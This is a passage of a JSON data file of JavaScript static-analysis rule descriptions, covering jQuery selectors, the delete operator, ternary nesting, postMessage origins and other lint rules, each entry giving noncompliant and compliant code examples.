Compliant - fast\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2715","repo":"javascript","name":"\"find\" should be used to select the children of an element known by id","htmlDesc":"<p>The use of <code>find<\/code> allows <code>document.getElementById()<\/code> to be used for the top-level selection, and saves the jQuery Sizzle\nengine for where it's really needed. That makes the query faster, and your application more responsive.<\/p>\n<p>From the jQuery documentation:<\/p>\n<blockquote>\n <p>Beginning your selector with an ID is always best.<\/p>\n <p>The <code>.find()<\/code> approach is faster because the first selection is handled without going through the Sizzle selector engine \u2013 ID-only\n selections are handled using <code>document.getElementById()<\/code>, which is extremely fast because it is native to the browser.<\/p>\n<\/blockquote>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar $productIds = $(\"#products div.id\"); \/\/ Noncompliant - a nested query for Sizzle selector engine\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar $productIds = $(\"#products\").find(\"div.id\"); \/\/ Compliant - #products is already selected by document.getElementById() so only div.id needs to go through Sizzle selector engine\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2757","repo":"javascript","name":"\"=+\" should not be used instead of \"+=\"","htmlDesc":"<p>The use of operators pairs (<code>=+<\/code> or <code>=-<\/code>) where the reversed, single operator was meant (<code>+=<\/code> or <code>-=<\/code>)\nwill compile and run, but not produce the expected results.<\/p>\n<p>This rule raises an issue when <code>=+<\/code> and <code>=-<\/code> are used without any space between the two operators and when there is at least\none whitespace after.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar target =-5;\nvar num = 3;\n\ntarget =- num; \/\/ Noncompliant; target = -3. Is that really what's meant?\ntarget =+ num; \/\/ Noncompliant; target = 3\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar target = -5;\nvar num = 3;\n\ntarget = -num; \/\/ Compliant; intent to assign inverse value of num is clear\ntarget += num;\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2770","repo":"javascript","name":"Deprecated jQuery methods should not be used","htmlDesc":"<p>Deprecation is a warning that a method has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth\ntransition away from the aging, soon-to-be-retired technology.<\/p>\n<p>This rule raises an issue when any of the following methods is used:<\/p>\n<ul>\n <li> <code>.andSelf()<\/code> <\/li>\n <li> <code>.context<\/code> <\/li>\n <li> <code>.die()<\/code> <\/li>\n <li> <code>.error()<\/code> <\/li>\n <li> <code>jQuery.boxModel<\/code> <\/li>\n <li> <code>jQuery.browser<\/code> <\/li>\n <li> <code>jQuery.sub()<\/code> <\/li>\n <li> <code>jQuery.support<\/code> <\/li>\n <li> <code>.live()<\/code> <\/li>\n <li> <code>.load()<\/code> <\/li>\n <li> <code>.selector<\/code> <\/li>\n <li> <code>.size()<\/code> <\/li>\n <li> <code>.toggle()<\/code> <\/li>\n <li> <code>.unload()<\/code> <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2817","repo":"javascript","name":"Web SQL databases should not be used","htmlDesc":"<p>The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some\nbrowsers. (It is not supported in Firefox or IE.)<\/p>\n<p>Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar db = window.openDatabase(\"myDb\", \"1.0\", \"Personal secrets stored here\", 2*1024*1024); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities\">OWASP Top Ten 2013 Category A9<\/a> - Using\n Components with Known Vulnerabilities <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2819","repo":"javascript","name":"Cross-document messaging domains should be carefully restricted","htmlDesc":"<p>HTML5 adds the ability to send messages to documents served from other domains. According to the specification:<\/p>\n<blockquote>\n Authors should not use the wildcard keyword (\n <code>*<\/code>) in the\n <code>targetOrigin<\/code> argument in messages that contain any confidential information, as otherwise there is no way to guarantee that the message\n is only delivered to the recipient to which it was intended.\n<\/blockquote>\n<p>To mitigate the risk of sending sensitive information to a document served from a hostile or unknown domain, this rule raises an issue each time\n<code>Window.postMessage<\/code> is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myWindow = document.getElementById('myIFrame').contentWindow;\nmyWindow.postMessage(message, \"*\"); \/\/ Noncompliant; how do you know what you loaded in 'myIFrame' is still there?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2870","repo":"javascript","name":"\"delete\" should not be used on arrays","htmlDesc":"<p>The <code>delete<\/code> operator can be used to remove a property from any object. Arrays are objects, so the <code>delete<\/code> operator can be\nused here too, but if it is, a hole will be left in the array because the indexes\/keys won't be shifted to reflect the deletion. <\/p>\n<p>The proper method for removing an element at a certain index would be:<\/p>\n<ul>\n <li> <code>Array.prototype.splice<\/code> - add\/remove elements from the the array <\/li>\n <li> <code>Array.prototype.pop<\/code> - add\/remove elements from the end of the array <\/li>\n <li> <code>Array.prototype.shift<\/code> - add\/remove elements from the beginning of the array <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\ndelete myArray[2]; \/\/ Noncompliant. myArray => ['a', 'b', undefined, 'd']\nconsole.log(myArray[2]); \/\/ expected value was 'd' but output is undefined\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myArray = ['a', 'b', 'c', 'd'];\n\n\/\/ removes 1 element from index 2\nremoved = myArray.splice(2, 1); \/\/ myArray => ['a', 'b', 'd']\nconsole.log(myArray[2]); \/\/ outputs 'd'\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2873","repo":"javascript","name":"Calls should not be made to non-callable values","htmlDesc":"<p>The fact that JavaScript is not a strongly typed language allows developers a lot of freedom, but that freedom can be dangerous if you go too far\nwith it. <\/p>\n<p>Specifically, it is syntactically acceptable to invoke any expression as though its value were a function. But a <code>TypeError<\/code> may be\nraised if you do.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfoo = 1;\nfoo(); \/\/ Noncompliant; TypeError\n\nfoo = undefined;\nfoo(); \/\/ Noncompliant; TypeError\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2898","repo":"javascript","name":"\"[type=...]\" should be used to select elements by type","htmlDesc":"<p>While <code>:<element_type><\/code> and <code>[type=\"<element_type>\"]<\/code> can both be used in jQuery to select elements by their\ntype, <code>[type=\"<element_type>\"]<\/code> is far faster because it can take advantage of the native DOM <code>querySelectorAll()<\/code> method\nin modern browsers. <\/p>\n<p>This rule raises an issue when following selectors are used:<\/p>\n<ul>\n <li> <code>:checkbox<\/code> <\/li>\n <li> <code>:file<\/code> <\/li>\n <li> <code>:image<\/code> <\/li>\n <li> <code>:password<\/code> <\/li>\n <li> <code>:radio<\/code> <\/li>\n <li> <code>:reset<\/code> <\/li>\n <li> <code>:text<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar input = $( \"form input:radio\" ); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar input = $( \"form input[type=radio]\" ); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2990","repo":"javascript","name":"The global \"this\" object should not be used","htmlDesc":"<p>When the keyword <code>this<\/code> is used outside of an object, it refers to the global <code>this<\/code> object, which is the same thing as the\n<code>window<\/code> object in a standard web page. This could be confusing to maintainers. Instead, simply drop the <code>this<\/code>, or replace it\nwith <code>window<\/code>; it will have the same effect and be more readable.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nthis.foo = 1; \/\/ Noncompliant\nconsole.log(this.foo); \/\/ Noncompliant\n\nfunction MyObj() {\n this.foo = 1; \/\/ Compliant\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) { \/\/ Compliant\n \/\/ ...\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfoo = 1;\nconsole.log(foo);\n\nfunction MyObj() {\n this.foo = 1;\n}\n\nMyObj.func1 = function() {\n if (this.foo == 1) {\n \/\/ ...\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2999","repo":"javascript","name":"\"new\" operators should be used with functions","htmlDesc":"<p>The <code>new<\/code> keyword should only be used with objects that define a constructor function. Use it with anything else, and you'll get a\n<code>TypeError<\/code> because there won't be a constructor function for the <code>new<\/code> keyword to invoke.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = 1;\n\nvar obj1 = new someClass; \/\/ Noncompliant;\nvar obj2 = new MyClass(); \/\/ Noncompliant if considerJSDoc parameter set to true. Compliant when considerJSDoc=false\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @constructor\n *\/\nfunction MyClass() {\n this.foo = 'bar';\n}\n\nvar someClass = function(){\n this.prop = 1;\n}\n\nvar obj1 = new someClass; \/\/ Compliant\nvar obj2 = new MyClass(); \/\/ Compliant regardless of considerJSDoc value\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[{"key":"considerJSDoc","htmlDesc":"Consider only functions with @constructor tag as constructor functions","defaultValue":"false","type":"BOOLEAN"}],"type":"BUG"},{"key":"javascript:S3001","repo":"javascript","name":"\"delete\" should be used only with object properties","htmlDesc":"<p>The semantics of the <code>delete<\/code> operator are a bit tricky, and it can only be reliably used to remove properties from objects. Pass\nanything else to it, and you may or may not get the desired result.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = 1;\ndelete x; \/\/ Noncompliant\n\nfunction foo(){\n..\n}\n\ndelete foo; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = {\n x:1,\n foo: function(){\n ...\n }\n};\ndelete obj.x;\ndelete obj.foo;\n\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3358","repo":"javascript","name":"Ternary operators should not be nested","htmlDesc":"<p>Just because you <em>can<\/em> do something, doesn't mean you should, and that's the case with nested ternary operations. Nesting ternary operators\nresults in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)\nscratching their heads and cursing.<\/p>\n<p>Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\npublic String getTitle(Person p) {\n\n return p.gender==Person.MALE?\"Mr. \":p.isMarried()?\"Mrs. \":\"Miss \" + p.getLastName(); \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\n String honorific = p.isMarried()?\"Mrs. \":\"Miss \";\n return p.gender==Person.MALE?\"Mr. \": honorific + p.getLastName();\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3500","repo":"javascript","name":"Attempts should not be made to update \"const\" variables","htmlDesc":"<p>Variables declared with <code>const<\/code> cannot be modified. Unfortunately, attempts to do so don't always raise an error; in a non-ES2015\nenvironment, such an attempt might simply be ignored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst pi = \"yes, please\";\npi = 3.14; \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3509","repo":"javascript","name":"Default parameters should not cause side effects","htmlDesc":"<p>The assignment of default parameter values is generally intended to help the caller. But when a default assignment causes side effects, the caller\nmay not be aware of the extra changes or may not fully understand their implications. I.e. default assignments with side effects may end up hurting\nthe caller, and for that reason, they should be avoided.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar count = 0;\n\nfunction go(i = count++) { \/\/ Noncompliant\n console.log(i);\n}\n\ngo(); \/\/ outputs 0\ngo(7); \/\/ outputs 7\ngo(); \/\/ outputs 1\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3513","repo":"javascript","name":"\"arguments\" should not be accessed directly","htmlDesc":"<p>The magic of JavaScript is that you can pass arguments to functions that don't declare parameters, and on the other side, you can use those\npassed-in arguments inside the no-args <code>function<\/code>. <\/p>\n<p>But just because you can, that does't mean you should. The expectation and use of arguments inside functions that don't explicitly declare them is\nconfusing to callers. No one should ever have to read and fully understand a function to be able to use it competently. <\/p>\n<p>If you don't want to name arguments explicitly, use the <code>...<\/code> syntax to specify that an a variable number of arguments is expected. Then\ninside the function, you'll be dealing with a first-class array, rather than an array-like structure.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction concatenate() {\n let args = Array.prototype.slice.call(arguments); \/\/ Noncompliant\n return args.join(', ');\n}\n\nfunction doSomething(isTrue) {\n var args = Array.prototype.slice.call(arguments, 1); \/\/ Noncompliant\n if (!isTrue) {\n for (var arg of args) {\n ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction concatenate(...args) {\n return args.join(', ');\n}\n\nfunction doSomething(isTrue, ...values) {\n if (!isTrue) {\n for (var value of values) {\n ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3514","repo":"javascript","name":"Destructuring syntax should be used for assignments","htmlDesc":"<p>ECMAScript 2015 introduced the ability to extract and assign multiple data points from an object or array simultaneously. This is called\n\"destructuring\", and it allows you to condense boilerplate code so you can concentrate on logic. <\/p>\n<p>This rule raises an issue when multiple pieces of data are extracted out of the same object or array and assigned to variables.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var a = obj1.a; \/\/ Noncompliant\n var b = obj1.b;\n\n var name = obj2.name; \/\/ ignored; there's only one extraction-and-assignment\n\n var zero = array[0]; \/\/ Noncompliant\n var one = array[1];\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo (obj1, obj2, array) {\n var {a, b} = obj1;\n\n var {name} = obj2; \/\/ this syntax works because var name and property name are the same\n\n var [zero, one] = array;\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3516","repo":"javascript","name":"Function returns should not be invariant","htmlDesc":"<p>When a function is designed to return an invariant value, it may be poor design, but it shouldn't adversely affect the outcome of your program.\nHowever, when it happens on all paths through the logic, it is likely a mistake.<\/p>\n<p>This rule raises an issue when a function contains several <code>return<\/code> statements that all return the same value.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo(a) { \/\/ Noncompliant\n let b = 12;\n if (a) {\n return b;\n }\n return b;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3523","repo":"javascript","name":"Function constructors should not be used","htmlDesc":"<p>In addition to being obtuse from a syntax perspective, function constructors are also dangerous: their execution evaluates the constructor's string\narguments similar to the way <code>eval<\/code> works, which could expose your program to random, unintended code which can be both slow and a security\nrisk.<\/p>\n<p>In general it is better to avoid it altogether, particularly when used to parse JSON data. You should use ECMAScript 5's built-in JSON functions or\na dedicated library.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar obj = new Function(\"return \" + data)(); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar obj = JSON.parse(data);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Function calls where the argument is a string literal (e.g. <code>(Function('return this'))()<\/code>) are ignored. <\/p>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S3524","repo":"javascript","name":"Braces and parentheses should be used consistently with arrow functions","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule raises an issue when the use of parentheses with an arrow function does\nnot conform to the configured requirements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the configured defaults forbidding parentheses<\/p>\n<pre>\nvar foo = (a) => { \/* ... *\/ }; \/\/ Noncompliant; remove parens from arg\nvar bar = (a, b) => { return 0; }; \/\/ Noncompliant; remove curly braces from body\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar foo = a => { \/* ... *\/ };\nvar bar = (a, b) => 0;\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[{"key":"body_braces","htmlDesc":"True to require curly braces around function body. False to forbid them for single-return bodies.","defaultValue":"false","type":"BOOLEAN"},{"key":"parameter_parens","htmlDesc":"True to require parentheses around parameters. False to forbid them for single parameter.","defaultValue":"false","type":"BOOLEAN"}],"type":"CODE_SMELL"},{"key":"javascript:S3525","repo":"javascript","name":"Class methods should be used instead of \"prototype\" assignments","htmlDesc":"<p>Originally JavaScript didn't support <code>class<\/code>es, and class-like behavior had to be kludged using things like <code>prototype<\/code>\nassignments for \"class\" functions. Fortunately, ECMAScript 2015 added classes, so any lingering <code>prototype<\/code> uses should be converted to\ntrue <code>class<\/code>es. The new syntax is more expressive and clearer, especially to those with experience in other languages.<\/p>\n<p>Specifically, with ES2015, you should simply declare a <code>class<\/code> and define its methods inside the class declaration.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction MyNonClass(initializerArgs = []) {\n this._values = [...initializerArgs];\n}\n\nMyNonClass.prototype.doSomething = function () { \/\/ Noncompliant\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n constructor(initializerArgs = []) {\n this._values = [...initializerArgs];\n }\n\n doSomething() {\n \/\/...\n }\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3533","repo":"javascript","name":"\"import\" should be used to include external code","htmlDesc":"<p>Before ECMAScript 2015, module management had to be ad-hoc or provided by 3rd-party libraries such as Node.js, Webpack, or RequireJS. Fortunately,\nES2015, provides language-standard mechanisms for module management, <code>import<\/code> and <code>export<\/code>, and older usages should be\nconverted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ circle.js\nexports.area = function (r) {\n return PI * r * r;\n};\n\n\/\/ foo.js\ndefine([\".\/cart\", \".\/horse\"], function(cart, horse) { \/\/ Noncompliant\n \/\/ ...\n});\n\n\/\/ bar.js\nconst circle = require('.\/circle.js'); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ circle.js\nlet area = function (r) {\n return PI * r * r;\n}\nexport default area;\n\n\/\/ foo.js\nimport cart from \".\/cart.js\";\nimport horse from \".\/horse.js\";\n\n\/\/ bar.js\nimport circle from \".\/circle.js\"\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3579","repo":"javascript","name":"Array indexes should be numeric","htmlDesc":"<p>JavaScript is flexible enough to allow you to store values in an array with either numeric or named indexes. That is, it supports associative\narrays. But creating and populating an object in JavaScript is just as easy as an array, and more reliable if you need named members.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet arr = [];\narr[0] = 'a';\narr['name'] = 'bob'; \/\/ Noncompliant\narr[1] = 'foo';\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet obj = {\n name: 'bob',\n arr: ['a', 'foo']\n};\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3616","repo":"javascript","name":"Comma and logical OR operators should not be used in switch cases","htmlDesc":"<p>The comma operator (<code>,<\/code>) evaluates its operands, from left to right, and returns the second one. That's useful in some situations, but\njust wrong in a <code>switch<\/code> <code>case<\/code>. You may think you're compactly handling multiple values in the case, but only the last one in\nthe comma-list will ever be handled. The rest will fall through to the default.<\/p>\n<p>Similarly the logical OR operator (<code>||<\/code>) will not work in a <code>switch<\/code> <code>case<\/code>, only the first argument will be\nconsidered at execution time.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch a {\n case 1,2: \/\/ Noncompliant; only 2 is ever handled by this case\n doTheThing(a);\n case 3 || 4: \/\/ Noncompliant; only '3' is handled\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\"); \/\/ this happens when a==1 or a == 4\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch a {\n case 1:\n case 2:\n doTheThing(a);\n case 3:\n case 4:\n doThatThing(a);\n case 5:\n doTheOtherThing(a);\n default:\n console.log(\"Neener, neener!\");\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3686","repo":"javascript","name":"Functions should not be called both with and without \"new\"","htmlDesc":"<p>Constructor functions, which create new object instances, must only be called with <code>new<\/code>. Non-constructor functions must not. Mixing\nthese two usages could lead to unexpected results at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction getNum() {\n return 5;\n}\n\nfunction Num(numeric, alphabetic) {\n this.numeric = numeric;\n this.alphabetic = alphabetic;\n}\n\nvar myFirstNum = getNum();\nvar my2ndNum = new getNum(); \/\/ Noncompliant. An empty object is returned, NOT 5\n\nvar myNumObj1 = new Num();\nvar myNumObj2 = Num(); \/\/ Noncompliant. undefined is returned, NOT an object\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3699","repo":"javascript","name":"The output of functions that don't return anything should not be used","htmlDesc":"<p>If a function does not return anything, it makes no sense to use its output. Specifically, passing it to another function, or assigning its\n\"result\" to a variable is probably a bug because such functions return <code>undefined<\/code>, which is probably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction foo() {\n}\n\na = foo();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo() {\n}\n\nfoo();\n<\/pre>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3735","repo":"javascript","name":"\"void\" should not be used","htmlDesc":"<p>The <code>void<\/code> operator evaluates its argument and unconditionally returns <code>undefined<\/code>. It can be useful in pre-ECMAScript 5\nenvironments, where <code>undefined<\/code> could be reassigned, but generally, its use makes code harder to understand.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvoid (function() {\n ...\n}());\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n(function() {\n ...\n}());\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>void 0<\/code> is used in place of <code>undefined<\/code>. <\/p>\n<pre>\nif (parameter === void 0) {...}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3758","repo":"javascript","name":"Values not convertible to numbers should not be used in numeric comparisons","htmlDesc":"<p>In a Zen-like manner, <code>NaN<\/code> isn't equal to anything, even itself. So comparisons (<code>>, <, >=, <=<\/code>) where one\noperand is <code>NaN<\/code> or evaluates to <code>NaN<\/code> always return <code>false<\/code>. Specifically, <code>undefined<\/code> and objects that\ncannot be converted to numbers evaluate to <code>NaN<\/code> when used in numerical comparisons.<\/p>\n<p>This rule raises an issue when there is at least one path through the code where one of the operands to a comparison is <code>NaN<\/code>,\n<code>undefined<\/code> or an <code>Object<\/code> which cannot be converted to a number.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x; \/\/ x is currently \"undefined\"\nif (someCondition()) {\n x = 42;\n}\n\nif (42 > x) { \/\/ Noncompliant; \"x\" might still be \"undefined\"\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj > 24) { \/\/ Noncompliant\n doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x;\nif (someCondition()) {\n x = 42;\n} else {\n x = foo();\n}\n\nif (42 > x) {\n doSomething();\n}\n\nvar obj = {prop: 42};\nif (obj.prop > 24) {\n doSomething();\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3776","repo":"javascript","name":"Cognitive Complexity of functions should not be too high","htmlDesc":"<p>Cognitive Complexity is a measure of how hard the control flow of a function is to understand. Functions with high Cognitive Complexity will be\ndifficult to maintain.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/redirect.sonarsource.com\/doc\/cognitive-complexity.html\">Cognitive Complexity<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"threshold","htmlDesc":"The maximum authorized complexity.","defaultValue":"15","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S3782","repo":"javascript","name":"Arguments to built-in functions should match documented types","htmlDesc":"<p>The types of the arguments to built-in functions are specified in the JavaScript language specifications. Calls to these functions should conform\nto the documented types, otherwise the result will most likely not be what was expected (e.g.: the call would always return <code>false<\/code>).<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x < 0.0042);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst isTooSmall = Math.abs(x) < 0.0042;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S3785","repo":"javascript","name":"\"in\" should not be used with primitive types","htmlDesc":"<p>The <code>in<\/code> operator tests whether the specified property is in the specified object.<\/p>\n<p>If the right operand is a of primitive type (i.e., not an object) the <code>in<\/code> operator raises a <code>TypeError<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar x = \"Foo\";\n\"length\" in x; \/\/ Noncompliant: TypeError\n0 in x; \/\/ Noncompliant: TypeError\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar x = new String(\"Foo\");\n\"length\" in x; \/\/ true\n0 in x; \/\/ true\n\"foobar\" in x; \/\/ false\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3786","repo":"javascript","name":"Template literal placeholder syntax should not be used in regular strings","htmlDesc":"<p>JavaScript allows developers to embed variables or expressions in strings using template literals, instead of string concatenation. This is done by\nusing expressions like <code>${variable} <\/code> in a string between two back-ticks (<code>`<\/code>).<\/p>\n<p>When used in a regular string literal (between double or single quotes) the template will not be evaluated and will be used as a literal, which is\nprobably not what was intended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(\"Today is ${date}\"); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconsole.log(`Today is ${date}`);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3796","repo":"javascript","name":"Callbacks of array methods should have return statements","htmlDesc":"<p>Arrays in JavaScript have several methods for filtering, mapping or folding that require a callback. Not having a return statement in such a\ncallback function is most likely a mistake.<\/p>\n<p>This rule applies for the following methods of an array:<\/p>\n<ul>\n <li> <code>Array.from<\/code> <\/li>\n <li> <code>Array.prototype.every<\/code> <\/li>\n <li> <code>Array.prototype.filter<\/code> <\/li>\n <li> <code>Array.prototype.find<\/code> <\/li>\n <li> <code>Array.prototype.findIndex<\/code> <\/li>\n <li> <code>Array.prototype.map<\/code> <\/li>\n <li> <code>Array.prototype.reduce<\/code> <\/li>\n <li> <code>Array.prototype.reduceRight<\/code> <\/li>\n <li> <code>Array.prototype.some<\/code> <\/li>\n <li> <code>Array.prototype.sort<\/code> <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n a.concat(b);\n}); \/\/ Noncompliant: No return statement\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar merged = arr.reduce(function(a, b) {\n return a.concat(b);\n});\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S3799","repo":"javascript","name":"Destructuring patterns should not be empty","htmlDesc":"<p>Destructuring is a convenient way of extracting multiple values from data stored in (possibly nested) objects and arrays. However, it is possible\nto create an empty pattern that has no effect. When empty curly braces or brackets are used to the right of a property name most of the time the\nintent was to use a default value instead.<\/p>\n<p>This rule raises an issue when empty destructuring pattern is used.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar {a: {}, b} = myObj; \/\/ Noncompliant\nfunction foo({first: [], second}) { \/\/ Noncompliant\n \/\/ 